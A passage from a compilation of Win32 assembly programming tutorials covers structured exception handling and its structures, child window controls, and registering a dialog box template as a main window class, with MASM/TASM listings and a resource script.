exception and the processor state before it. The exception manager also adds
its own entry to the exception list.
An exception handler is in fact a typical callback. It is not, however,
installed by any API function; instead it is placed in an E_L_ENTRY that is
linked into the exception list.
EXCEPTION_DISPOSITION __cdecl _except_handler (
struct _EXCEPTION_RECORD *ExceptionRecord,
void * EstablisherFrame,
struct _CONTEXT *ContextRecord,
void * DispatcherContext
);
The exception handler uses the C calling convention: it does not release its
arguments when returning. The most important parameters are ExceptionRecord
and ContextRecord, described at the end of this text, which point to the
corresponding pushed structures. I do not yet have any idea what the purpose
of EstablisherFrame and DispatcherContext is.
struc EXCEPTION_RECORD
ExceptionCode dd ? ; See at the end of this text
ExceptionFlags dd ?
ExceptionRecord dd ? ; ?
ExceptionAddress dd ? ; Linear address of faulty instruction
NumberParameters dd ? ; Corresponds to the field below
ExceptionInformation dd 15 dup (?) ; ?
ends
Exception flags are:
EXCEPTION_NONCONTINUABLE = 1
EXCEPTION_UNWINDING = 2
EXCEPTION_UNWINDING_FOR_EXIT = 4
The exception handler has two possible ways of proceeding. It can return to
the exception manager, or it can unwind the stack and continue the program. In
the first case it has to return one of the following values:
enum EXCEPTION_DISPOSITION \
ExceptionContinueExecution = 0,\
ExceptionContinueSearch = 1,\
ExceptionNestedException = 2,\
ExceptionCollidedUnwind = 3
The value of zero forces the exception manager to continue the program
at the cs:eip saved in the context, which may be altered by the exception
handler. The value of 1 causes the exception manager to call the next
exception handler in the exception list. Values 2 and 3 inform the exception
manager that an error occurred: an exception-in-exception happened, or the
handler wanted to unwind the stack while another handler higher up was
already doing so.
The other case can be recognised when .ExceptionFlags contains
EXCEPTION_UNWINDING or EXCEPTION_UNWINDING_FOR_EXIT.
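The way the exception manager uses the first two return values can be
pictured with a toy model in Python. This is a heavy simplification under
stated assumptions: handlers are plain functions in a Python list (newest
entry first) instead of E_L_ENTRY records linked from fs:0, the context
record and unwinding are left out, and dispatch and both sample handlers are
names invented here.

```python
CONTINUE_EXECUTION = 0      # ExceptionContinueExecution
CONTINUE_SEARCH = 1         # ExceptionContinueSearch

def dispatch(handlers, code):
    """Offer the exception code to each handler in list order.

    Returns the index of the handler that asked to continue execution,
    or None if every handler passed the exception on.
    """
    for index, handler in enumerate(handlers):
        disposition = handler(code)
        if disposition == CONTINUE_EXECUTION:
            return index
        if disposition != CONTINUE_SEARCH:
            raise RuntimeError("disposition %d is not modelled" % disposition)
    return None

def ignore_everything(code):
    return CONTINUE_SEARCH

def fix_illegal_opcode(code):
    if code == 0xC000001D:              # STATUS_ILLEGAL_INSTRUCTION
        return CONTINUE_EXECUTION
    return CONTINUE_SEARCH

if __name__ == "__main__":
    chain = [ignore_everything, fix_illegal_opcode]
    print(dispatch(chain, 0xC000001D))
    print(dispatch(chain, 0xC0000005))
```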
While appending a new exception handler to the exception list, a common
practice is to push new E_L_ENTRY onto the stack. This way unwinding the stack
can be done simply by skipping the exception manager's entry and restoring the
stack pointer.
Here is an example of exception handling.
----Start-of-file-------------------------------------------------------------
ideal
p686n
model flat, stdcall
O equ <offset>
struc EXCEPTION_RECORD
ExceptionCode dd ?
ExceptionFlags dd ?
ExceptionRecord dd ?
ExceptionAddress dd ?
NumberParameters dd ?
ExceptionInformation dd 15 dup (?)
ends
procdesc wsprintfA c :dword, :dword, :dword:?
procdesc MessageBoxA :dword, :dword, :dword, :dword
procdesc ExitProcess :dword
udataseg
ExCode dd ?
szCode db 12 dup (?)
dataseg
szWindowTitle db 'Exception code', 0
szFormat db '%0X', 0
codeseg
proc main
; Install exception handler
push O ExceptionHandler
push [dword fs:0] ; E_L_ENTRY.Next
mov [fs:0], esp ; Append new E_L_ENTRY
; Cause Invalid Opcode exception
ud2
; Display exception code and quit
_Continue: call wsprintfA, O szCode, O szFormat, [ExCode]
call MessageBoxA, 0, O szCode, O szWindowTitle, 0
call ExitProcess, 0
endp
proc ExceptionHandler c ExceptionRecord, EF, ContextRecord, DC
; Save exception code
mov eax, [ExceptionRecord]
mov ecx, [(EXCEPTION_RECORD eax).ExceptionCode]
mov [ExCode], ecx
; Unwind the stack
mov eax, [fs:0] ; Exception Manager's entry
mov esp, [eax] ; Our entry
pop [dword fs:0] ; Restore fs:0
add esp, 4 ; Skip ExHandler address
jmp _Continue
endp
end main
----End-of-file---------------------------------------------------------------
The above source should be assembled and linked with TASM 5.0r or later like this:
tasm32 /ml except.asm
tlink32 /x /Tpe /aa /c /V4.0 except.obj,,, LIBPATH\import32.lib
Here are other important constants and structures, all defined in the
Platform SDK header file winnt.h.
Exception codes:
----------------
STATUS_SEGMENT_NOTIFICATION = 040000005h
STATUS_GUARD_PAGE_VIOLATION = 080000001h
STATUS_DATATYPE_MISALIGNMENT = 080000002h
STATUS_BREAKPOINT = 080000003h
STATUS_SINGLE_STEP = 080000004h
STATUS_ACCESS_VIOLATION = 0C0000005h
STATUS_IN_PAGE_ERROR = 0C0000006h
STATUS_INVALID_HANDLE = 0C0000008h
STATUS_NO_MEMORY = 0C0000017h
STATUS_ILLEGAL_INSTRUCTION = 0C000001Dh
STATUS_NONCONTINUABLE_EXCEPTION = 0C0000025h
STATUS_INVALID_DISPOSITION = 0C0000026h
STATUS_ARRAY_BOUNDS_EXCEEDED = 0C000008Ch
STATUS_FLOAT_DENORMAL_OPERAND = 0C000008Dh
STATUS_FLOAT_DIVIDE_BY_ZERO = 0C000008Eh
STATUS_FLOAT_INEXACT_RESULT = 0C000008Fh
STATUS_FLOAT_INVALID_OPERATION = 0C0000090h
STATUS_FLOAT_OVERFLOW = 0C0000091h
STATUS_FLOAT_STACK_CHECK = 0C0000092h
STATUS_FLOAT_UNDERFLOW = 0C0000093h
STATUS_INTEGER_DIVIDE_BY_ZERO = 0C0000094h
STATUS_INTEGER_OVERFLOW = 0C0000095h
STATUS_PRIVILEGED_INSTRUCTION = 0C0000096h
STATUS_STACK_OVERFLOW = 0C00000FDh
STATUS_CONTROL_C_EXIT = 0C000013Ah
STATUS_FLOAT_MULTIPLE_FAULTS = 0C00002B4h
STATUS_FLOAT_MULTIPLE_TRAPS = 0C00002B5h
STATUS_ILLEGAL_VLM_REFERENCE = 0C00002C0h
Context flags:
--------------
CONTEXT_i386 = 000010000h
CONTEXT_i486 = 000010000h
CONTEXT_CONTROL = (CONTEXT_i386 or 1) ; SS:ESP, CS:EIP, EFLAGS, EBP
CONTEXT_INTEGER = (CONTEXT_i386 or 2) ; EAX, EBX,..., ESI, EDI
CONTEXT_SEGMENTS = (CONTEXT_i386 or 4) ; DS, ES, FS, GS
CONTEXT_FLOATING_POINT = (CONTEXT_i386 or 8) ; 387 state
CONTEXT_DEBUG_REGISTERS = (CONTEXT_i386 or 16); DB 0-3,6,7
CONTEXT_EXTENDED_REGISTERS = (CONTEXT_i386 or 32); cpu specific extensions
CONTEXT_FULL = (CONTEXT_CONTROL or CONTEXT_INTEGER or\
CONTEXT_SEGMENTS)
Context structure:
------------------
struc CONTEXT
ContextFlags dd ? ; CONTEXT_??? flags
Dr0 dd ? ; Debug registers
Dr1 dd ?
Dr2 dd ?
Dr3 dd ?
Dr6 dd ?
Dr7 dd ?
ControlWord dd ? ; FPU context
StatusWord dd ?
TagWord dd ?
ErrorOffset dd ?
ErrorSelector dd ?
DataOffset dd ?
DataSelector dd ?
RegisterArea dt 8 dup (?)
Cr0NpxState dd ?
SegGs dd ? ; Segment registers
SegFs dd ?
SegEs dd ?
SegDs dd ?
Edi dd ? ; Integer registers
Esi dd ?
Ebx dd ?
Edx dd ?
Ecx dd ?
Eax dd ?
Ebp dd ? ; Control registers
Eip dd ?
SegCs dd ?
EFlags dd ?
Esp dd ?
SegSs dd ?
ExtendedRegisters db 512 dup (?)
ends
Additional word
---------------
This article was posted on comp.lang.asm.x86.
Special thanks to Michael Tippach for pointing out some exception flags.
My web page is at http://ams.ampr.org/cdragan/
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Child Window Controls
by Iczelion
In this tutorial, we will explore child window controls which are very
important input and output devices of our programs.
Theory
------
Windows provides several predefined window classes which we can readily use
in our own programs. Most of the time we use them as components of a dialog
box, so they're usually called child window controls. The child window
controls process their own mouse and keyboard messages and notify the
parent window when their states have changed. They relieve programmers of
an enormous burden, so you should use them as much as possible. In this
tutorial, I put them on a normal window just to demonstrate how you can
create and use them, but in reality you should put them in a dialog box.
Examples of predefined window classes are button, listbox, checkbox, radio
button, edit, etc.
In order to use a child window control, you must create it with
CreateWindow or CreateWindowEx. Note that you don't have to register the
window class since it's registered for you by Windows. The class name
parameter MUST be the predefined class name. Say, if you want to create a
button, you must specify "button" as the class name in CreateWindowEx. The
other parameters you must fill in are the parent window handle and the
control ID. The control ID identifies the control within its parent window:
it must be unique among that window's controls, and you use it to tell the
controls apart.
After the control is created, it sends messages notifying the parent
window whenever its state changes. Normally, you create the child windows
while processing the WM_CREATE message of the parent window. The child
window sends WM_COMMAND messages to the parent window with its control ID in
the low word of wParam, the notification code in the high word of wParam,
and its window handle in lParam. Each kind of child window control has its
own notification codes; refer to your Win32 API reference for more
information.
The parent window can send commands to the child windows too, by calling
the SendMessage function. SendMessage sends the specified message, with
accompanying values in wParam and lParam, to the window specified by the
window handle. It's an extremely useful function since it can send messages
to any window provided you know its window handle.
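As a small illustration of a parent sending commands to a child, here is a
sketch that is not part of the example program. It assumes hwndEdit already
holds the handle of an edit control and TestString is a zero-terminated
string, as in the listing in the Application section. WM_SETTEXT replaces
the control's text, and EM_SETSEL with 0 and -1 selects all of it.

```asm
; Sketch only: hwndEdit and TestString are assumed to be defined
; as in the example program of this tutorial.
invoke SendMessage, hwndEdit, WM_SETTEXT, 0, ADDR TestString ; wParam unused, lParam -> text
invoke SendMessage, hwndEdit, EM_SETSEL, 0, -1               ; select the whole text
```

Which values go into wParam and lParam depends entirely on the message, so
each message has to be looked up in the API reference.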
So, after creating the child windows, the parent window must process
WM_COMMAND messages to be able to receive notification codes from the child
windows.
Application
-----------
We will create a window which contains an edit control and a pushbutton.
When you click the button, a message box will appear showing the text you
typed in the edit box. There is also a menu with 4 menu items:
1. Say Hello -- Put a text string into the edit box
2. Clear Edit Box -- Clear the content of the edit box
3. Get Text -- Display a message box with the text in the edit box
4. Exit -- Close the program.
.386
.model flat,stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
ClassName db "SimpleWinClass",0
AppName db "Our First Window",0
MenuName db "FirstMenu",0
ButtonClassName db "button",0
ButtonText db "My First Button",0
EditClassName db "edit",0
TestString db "Wow! I'm in an edit box now",0
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
hwndButton HWND ?
hwndEdit HWND ?
buffer db 512 dup(?) ; buffer to store the text retrieved from the edit box
.const
ButtonID equ 1 ; The control ID of the button control
EditID equ 2 ; The control ID of the edit control
IDM_HELLO equ 1
IDM_CLEAR equ 2
IDM_GETTEXT equ 3
IDM_EXIT equ 4
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess,eax
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hwnd:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_BTNFACE+1
mov wc.lpszMenuName,OFFSET MenuName
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
invoke CreateWindowEx,WS_EX_CLIENTEDGE,ADDR ClassName, \
ADDR AppName, WS_OVERLAPPEDWINDOW,\
CW_USEDEFAULT, CW_USEDEFAULT,\
300,200,NULL,NULL, hInst,NULL
mov hwnd,eax
invoke ShowWindow, hwnd,SW_SHOWNORMAL
invoke UpdateWindow, hwnd
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_DESTROY
invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_CREATE
invoke CreateWindowEx,WS_EX_CLIENTEDGE, ADDR EditClassName,NULL,\
WS_CHILD or WS_VISIBLE or WS_BORDER or ES_LEFT or\
ES_AUTOHSCROLL,\
50,35,200,25,hWnd,EditID,hInstance,NULL
mov hwndEdit,eax
invoke SetFocus, hwndEdit
invoke CreateWindowEx,NULL, ADDR ButtonClassName,ADDR ButtonText,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
75,70,140,25,hWnd,ButtonID,hInstance,NULL
mov hwndButton,eax
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
.IF ax==IDM_HELLO
invoke SetWindowText,hwndEdit,ADDR TestString
.ELSEIF ax==IDM_CLEAR
invoke SetWindowText,hwndEdit,NULL
.ELSEIF ax==IDM_GETTEXT
invoke GetWindowText,hwndEdit,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
.ELSE
invoke DestroyWindow,hWnd
.ENDIF
.ELSE
.IF ax==ButtonID
shr eax,16
.IF ax==BN_CLICKED
invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
end start
Analysis
--------
Let's analyze the program.
.ELSEIF uMsg==WM_CREATE
invoke CreateWindowEx,WS_EX_CLIENTEDGE, \
ADDR EditClassName,NULL,\
WS_CHILD or WS_VISIBLE or WS_BORDER or ES_LEFT\
or ES_AUTOHSCROLL,\
50,35,200,25,hWnd,EditID,hInstance,NULL
mov hwndEdit,eax
invoke SetFocus, hwndEdit
invoke CreateWindowEx,NULL, ADDR ButtonClassName,\
ADDR ButtonText,\
WS_CHILD or WS_VISIBLE or BS_DEFPUSHBUTTON,\
75,70,140,25,hWnd,ButtonID,hInstance,NULL
mov hwndButton,eax
We create the controls while processing the WM_CREATE message. We call
CreateWindowEx with an extended window style, WS_EX_CLIENTEDGE, which makes
the client area look sunken. The class name of each control is a predefined
one: "edit" for the edit control, "button" for the button control. Next we
specify the child window's styles. Each control has extra styles in
addition to the normal window styles. For example, button styles are
prefixed with "BS_" for "button style" and edit styles with "ES_" for "edit
style". You have to look these styles up in a Win32 API reference. Note
that you put the control ID in place of the menu handle. This causes no
harm since a child window control cannot have a menu.
After creating each control, we keep its handle in a variable for future
use.
SetFocus is called to give input focus to the edit box so the user can type
the text into it immediately.
Now comes the really exciting part. Every child window control sends
notification to its parent window with WM_COMMAND.
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
Recall that a menu also sends WM_COMMAND messages to notify the window
about its state. How can you tell whether a WM_COMMAND message originated
from a menu or from a control? Below is the answer:

          Low word of wParam   High word of wParam   lParam
Menu      Menu ID              0                     0
Control   Control ID           Notification code     Child window handle

You can see that you should check lParam. If it's zero, the current
WM_COMMAND message is from a menu. You cannot use wParam to differentiate
between a menu and a control since the menu ID and control ID may be
identical and the notification code may be zero.
.IF ax==IDM_HELLO
invoke SetWindowText,hwndEdit,ADDR TestString
.ELSEIF ax==IDM_CLEAR
invoke SetWindowText,hwndEdit,NULL
.ELSEIF ax==IDM_GETTEXT
invoke GetWindowText,hwndEdit,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
You can put a text string into an edit box by calling SetWindowText. You
clear the content of an edit box by calling SetWindowText with NULL.
SetWindowText is a general purpose API function. You can use SetWindowText
to change the caption of a window or the text on a button.
To get the text in an edit box, you use GetWindowText.
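A possible refinement, shown here only as a sketch and not as part of the
original program, is to ask for the length of the text first and skip the
message box when the edit box is empty. It assumes hwndEdit, buffer and
AppName are defined as in the listing above; GetWindowTextLength is a
standard user32 function.

```asm
; Sketch only: show the message box only when the edit box holds text.
invoke GetWindowTextLength, hwndEdit        ; eax = number of characters, 0 if none
.IF eax != 0
    invoke GetWindowText, hwndEdit, ADDR buffer, 512
    invoke MessageBox, NULL, ADDR buffer, ADDR AppName, MB_OK
.ENDIF
```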
.IF ax==ButtonID
shr eax,16
.IF ax==BN_CLICKED
invoke SendMessage,hWnd,WM_COMMAND,IDM_GETTEXT,0
.ENDIF
.ENDIF
The above code snippet handles the case when the user presses the
button. First, it checks the low word of wParam to see if the control ID
matches that of the button. If it does, it checks the high word of wParam to
see if it is the notification code BN_CLICKED, which is sent when the button
is clicked.
The interesting part comes once we are certain that the notification code is
BN_CLICKED. We want to get the text from the edit box and display it in a
message box. We could duplicate the code in the IDM_GETTEXT section above,
but that makes little sense. If we can somehow send a WM_COMMAND message
with the low word of wParam containing the value IDM_GETTEXT to our own
window procedure, we can avoid code duplication and simplify our program.
The SendMessage function is the answer. This function sends any message to
any window with any wParam and lParam we want. So instead of duplicating the
code, we call SendMessage with the parent window handle, WM_COMMAND,
IDM_GETTEXT, and 0. This has the same effect as selecting the "Get Text"
menu item from the menu. The window procedure doesn't perceive any
difference between the two.
You should use this technique as much as possible to make your code more
organized.
Last but not least, do not forget the TranslateMessage function in the
message loop. Since you need to type text into the edit box, your
program must translate raw keyboard input into readable text. If you omit
this function, you will not be able to type anything into your edit box.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Dialog Box as Main Window
by Iczelion
Now comes the really interesting part about GUI, the dialog box. In this
tutorial (and the next), we will learn how to use a dialog box as our main
window.
Theory
------
If you play with the examples in the previous tutorial long enough, you'll
find out that you cannot move the input focus from one child window control
to another with the Tab key. The only way to do that is to click the
control you want to receive the input focus, which is rather cumbersome.
Another thing you might notice is that I changed the background color of
the parent window to gray instead of the normal white used in previous
examples. This is done so that the color of the child window controls
blends seamlessly with the color of the client area of the parent window.
There is a way to get around the Tab key problem but it's not easy: you have
to subclass all child window controls in your parent window.
The reason why such inconvenience exists is that child window controls are
originally designed to work with a dialog box, not a normal window. The
default color of child window controls such as a button is gray because the
client area of a dialog box is normally gray so they blend into each other
without any sweat on the programmer's part.
Before we get deep into the details, we should first know what a dialog box
is. A dialog box is nothing more than a normal window which is designed to
work with child window controls. Windows also provides an internal "dialog
box manager" which is responsible for most of the keyboard logic, such as
shifting the input focus when the user presses Tab or pressing the default
pushbutton when the Enter key is pressed, so programmers can deal with
higher level tasks. Dialog boxes are primarily used as input/output devices.
As such, a dialog box can be considered an input/output "black box": you
don't have to know how a dialog box works internally in order to use it,
you only have to know how to interact with it. That's a principle of object
oriented programming (OOP) called information hiding. If the black box is
*perfectly* designed, the user can make use of it without any knowledge of
how it operates. The catch is that the black box must be perfect, and
that's hard to achieve in the real world. The Win32 API is designed as a
black box too.
Well, it seems we have strayed from our path. Let's get back to our subject.
Dialog boxes are designed to reduce the programmer's workload. Normally, if
you put child window controls on a normal window, you have to subclass them
and write the keyboard logic yourself. But if you put them on a dialog box,
it will handle the logic for you. You only have to know how to get the user
input from the dialog box or how to send commands to it.
A dialog box is defined as a resource in much the same way as a menu. You
write a dialog box template describing the characteristics of the dialog
box and its controls and then compile the resource script with a resource
compiler.
Note that all resources are put together in the same resource script file.
You can use any text editor to write a dialog box template but I don't
recommend it. You should use a resource editor to do the job visually since
arranging child window controls on a dialog box is hard to do manually.
Several excellent resource editors are available. Most of the major
compiler suites include their own resource editors. You can use them to
create a resource script for your program and then cut out irrelevant lines
such as those related to MFC.
There are two main types of dialog box: modal and modeless. A modeless
dialog box lets you change the input focus to another window. An example is
the Find dialog of MS Word. There are two subtypes of modal dialog box:
application modal and system modal. An application modal dialog box doesn't
let you change the input focus to another window in the same application,
but you can change the input focus to a window of ANOTHER application. A
system modal dialog box doesn't allow you to change the input focus to any
other window until you respond to it first.
A modeless dialog box is created by calling CreateDialogParam API function.
A modal dialog box is created by calling DialogBoxParam. The only
distinction between an application modal dialog box and a system modal one
is the DS_SYSMODAL style. If you include DS_SYSMODAL style in a dialog box
template, that dialog box will be a system modal one.
You can communicate with any child window control on a dialog box by using
SendDlgItemMessage function. Its syntax is like this:
SendDlgItemMessage proto hwndDlg:DWORD,\
idControl:DWORD,\
uMsg:DWORD,\
wParam:DWORD,\
lParam:DWORD
This API call is immensely useful for interacting with a child window
control. For example, if you want to get the text from an edit control, you
can do this:
invoke SendDlgItemMessage, hDlg, ID_EDITBOX, WM_GETTEXT, 256, ADDR text_buffer
In order to know which message to send, you should consult your Win32 API
reference.
Windows also provides several control-specific API functions to get and set
data quickly, for example GetDlgItemText, CheckDlgButton, etc. These
control-specific functions are provided for the programmer's convenience so
you don't have to look up the meanings of wParam and lParam for each
message. Normally, you should use control-specific API calls when they're
available since they make source code maintenance easier. Resort to
SendDlgItemMessage only if no control-specific API calls are available.
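To make the comparison concrete, the sketch below pairs each generic
SendDlgItemMessage call with the control-specific function that does the
same job. hDlg, ID_EDITBOX and text_buffer are the placeholder names used
above; ID_CHECKBOX is a hypothetical control ID for a check box, introduced
only for this illustration.

```asm
; Sketch only: hDlg, ID_EDITBOX, ID_CHECKBOX and text_buffer are assumed names.
; Both calls copy up to 256 characters of the edit control's text:
invoke SendDlgItemMessage, hDlg, ID_EDITBOX, WM_GETTEXT, 256, ADDR text_buffer
invoke GetDlgItemText, hDlg, ID_EDITBOX, ADDR text_buffer, 256
; Both calls put a check mark on the check box:
invoke SendDlgItemMessage, hDlg, ID_CHECKBOX, BM_SETCHECK, BST_CHECKED, 0
invoke CheckDlgButton, hDlg, ID_CHECKBOX, BST_CHECKED
```

Note how the order and meaning of the arguments differ between the two
forms; the control-specific functions spare you from remembering what goes
into wParam and what goes into lParam.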
The Windows dialog box manager sends some messages to a specialized
callback function called a dialog box procedure which has the following
format:
DlgProc proto hDlg:DWORD ,\
iMsg:DWORD ,\
wParam:DWORD ,\
lParam:DWORD
The dialog box procedure is very similar to a window procedure except for
the type of the return value, which is TRUE/FALSE instead of LRESULT. The
internal dialog box manager inside Windows IS the true window procedure for
the dialog box. It calls our dialog box procedure with some of the messages
that it receives. So the general rule of thumb is: if our dialog box
procedure processes a message, it MUST return TRUE in eax, and if it does
not process the message, it must return FALSE in eax. Note that a dialog box
procedure doesn't pass the messages it does not process to DefWindowProc
since it's not a real window procedure.
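The return value rule can be sketched with a dialog box procedure that
handles a single message. This is only an illustration, not the procedure
used later in this tutorial; it assumes a modal dialog box, which is why it
calls EndDialog.

```asm
; Sketch only: a dialog box procedure that processes just WM_CLOSE.
DlgProc proc hDlg:DWORD, iMsg:DWORD, wParam:DWORD, lParam:DWORD
    .IF iMsg==WM_CLOSE
        invoke EndDialog, hDlg, 0   ; assumes the dialog box is modal
        mov eax, TRUE               ; we processed the message
    .ELSE
        mov eax, FALSE              ; not processed: no DefWindowProc call here,
                                    ; the dialog box manager does the default work
    .ENDIF
    ret
DlgProc endp
```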
There are two distinct uses of a dialog box. You can use it as the main
window of your application or use it as an input device. We'll examine the
first approach in this tutorial.
"Using a dialog box as main window" can be interpreted in two different
senses.
1. You can use the dialog box template as a class template which you
register with RegisterClassEx call. In this case, the dialog box
behaves like a "normal" window: it receives messages via a window
procedure referred to by lpfnWndProc member of the window class, not
via a dialog box procedure. The benefit of this approach is that you
don't have to create child window controls yourself, Windows creates
them for you when the dialog box is created. Also Windows handles the
keyboard logic for you such as Tab order etc. Plus you can specify the
cursor and icon of your window in the window class structure.
2. Your program just creates the dialog box without creating any parent
window. This approach makes a message loop unnecessary since the
messages are sent directly to the dialog box procedure. You don't even
have to register a window class!
This tutorial is going to be a long one. I'll present the first approach
followed by the second.
Application
-----------
------------------------------------------------------------------------
dialog.asm
------------------------------------------------------------------------
.386
.model flat,stdcall
option casemap:none
WinMain proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
ClassName db "DLGCLASS",0
MenuName db "MyMenu",0
DlgName db "MyDialog",0
AppName db "Our First Dialog Box",0
TestString db "Wow! I'm in an edit box now",0
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)
.const
IDC_EDIT equ 3000
IDC_BUTTON equ 3001
IDC_EXIT equ 3002
IDM_GETTEXT equ 32000
IDM_CLEAR equ 32001
IDM_EXIT equ 32002
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke GetCommandLine
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess,eax
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX
LOCAL msg:MSG
LOCAL hDlg:HWND
mov wc.cbSize,SIZEOF WNDCLASSEX
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,DLGWINDOWEXTRA
push hInst
pop wc.hInstance
mov wc.hbrBackground,COLOR_BTNFACE+1
mov wc.lpszMenuName,OFFSET MenuName
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc
invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL
mov hDlg,eax
invoke ShowWindow, hDlg,SW_SHOWNORMAL
invoke UpdateWindow, hDlg
invoke GetDlgItem,hDlg,IDC_EDIT
invoke SetFocus,eax
.WHILE TRUE
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke IsDialogMessage, hDlg, ADDR msg
.IF eax ==FALSE
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDIF
.ENDW
mov eax,msg.wParam
ret
WinMain endp
WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_DESTROY
invoke PostQuitMessage,NULL
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
.IF ax==IDM_GETTEXT
invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
.ELSEIF ax==IDM_CLEAR
invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
.ELSE
invoke DestroyWindow,hWnd
.ENDIF
.ELSE
mov edx,wParam
shr edx,16
.IF dx==BN_CLICKED
.IF ax==IDC_BUTTON
invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
.ELSEIF ax==IDC_EXIT
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
.ENDIF
.ENDIF
.ENDIF
.ELSE
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
ret
.ENDIF
xor eax,eax
ret
WndProc endp
end start
------------------------------------------------------------------------
Dialog.rc
------------------------------------------------------------------------
#include "resource.h"
#define IDC_EDIT 3000
#define IDC_BUTTON 3001
#define IDC_EXIT 3002
#define IDM_GETTEXT 32000
#define IDM_CLEAR 32001
#define IDM_EXIT 32002
MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our First Dialog Box"
CLASS "DLGCLASS"
BEGIN
EDITTEXT IDC_EDIT, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
DEFPUSHBUTTON "Say Hello", IDC_BUTTON, 141,10,52,13
PUSHBUTTON "E&xit", IDC_EXIT, 141,26,52,13, WS_GROUP
END
MyMenu MENU
BEGIN
POPUP "Test Controls"
BEGIN
MENUITEM "Get Text", IDM_GETTEXT
MENUITEM "Clear Text", IDM_CLEAR
MENUITEM SEPARATOR
MENUITEM "E&xit", IDM_EXIT
END
END
Analysis
--------
Let's analyze this first example.
This example shows how to register a dialog template as a window class and
create a "window" from that class. It simplifies your program since you
don't have to create the child window controls yourself.
Let's first analyze the dialog template.
MyDialog DIALOG 10, 10, 205, 60
This line declares the name of the dialog box, in this case "MyDialog",
followed by the keyword "DIALOG". The following four numbers are the x, y,
width, and height of the dialog box in dialog box units (not the same as
pixels).
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
Declare the styles of the dialog box.
CAPTION "Our First Dialog Box"
This is the text that will appear in the dialog box's title bar.
CLASS "DLGCLASS"
This line is crucial. It's this CLASS keyword that allows us to use the
dialog box template as a window class. Following the keyword is the name of
the "window class".
BEGIN
EDITTEXT IDC_EDIT, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
